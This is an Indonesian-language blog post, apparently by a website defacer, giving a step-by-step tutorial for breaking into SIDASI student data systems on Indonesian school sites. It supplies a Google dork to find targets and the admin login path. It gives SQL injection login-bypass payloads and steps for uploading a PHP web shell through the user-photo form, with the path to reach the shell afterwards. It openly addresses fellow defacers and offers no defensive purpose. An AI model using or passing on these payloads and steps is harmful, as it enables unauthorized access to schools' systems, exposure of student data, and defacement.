Hay guys balik lagi ama mimin ganteng :D, kali ini mimin akan memberikan tutor deface lagi yaitu Metode Sistem Data Siswa (SIDASI) - Unauthenticated Bypass
Apakah bisa upload Shell?
Tempat upload shell dimana bang?
Index(homepage) Bisa ditebas bang?
Abang ganteng gak? Iya dong jelas :v
Skuy
Langsung Saja
Bahan Bahan :
- Dork :
- site:sidasi.* inurl:sch.id
( Kembangin Lagi saya Yakin Banyak Yg Vuln soalnya )
- Exploit/Admin Login : /?page=admin
- Shell Backdoor : Search Google
- Payload :
Username : '=' 'or'
Password : '=' 'or'
~~
Username : ' or 1=1 limit 1 -- -+
Password : ' or 1=1 limit 1 -- -+
------------------------
Step By Step :
------------------------
1) Dorking dulu Menggunakan dork diatas.
2) Lalu tempelkan exploit dibelakang site, example : site.sch.id/?page=admin
Otomatis nanti akan dibawa ke ADMIN LOGIN.
masukkan payload, username & password.
Username : '=' 'or'
Password : '=' 'or'
~~
Username : ' or 1=1 limit 1 -- -+
Password : ' or 1=1 limit 1 -- -+
Lalu klik Login Jika vuln maka akan tertuju ke dashboard. Jika tidak tinggalin.
3) Jika Sudah Masuk Ke Dashboard klik SETTING USER Di sebelah tulisan GRAFIK, Sorry Kepotong :D
4) Sudah Klik SETTING USER? Kalian klik tambah Berwarna biru dibawah.
5) Jika Sudah Maka Tampilannya Akan Seperti dibawah:
isi data bebas, dan ada tulisan PILIH FILE, Disitu Kalian Upload Shell backdoor,Jika Data sudah dilengkapi, silahkan klik CHOOSE
6) Terakhir.. Manggil shell Backdoornya adalah :
Site/assets/gambar/user/shellKalian.php
Jika Ke Shell Backdoor Ya tau lah mau ngapain bebas,Terserah Kalian.
Oke Sekian Tutor Deface Dari saya, Mohon maaf jika ada kata" yg salah.
Semoga bermanfaat bagi kalangan defacer.
Tags:
DEFACE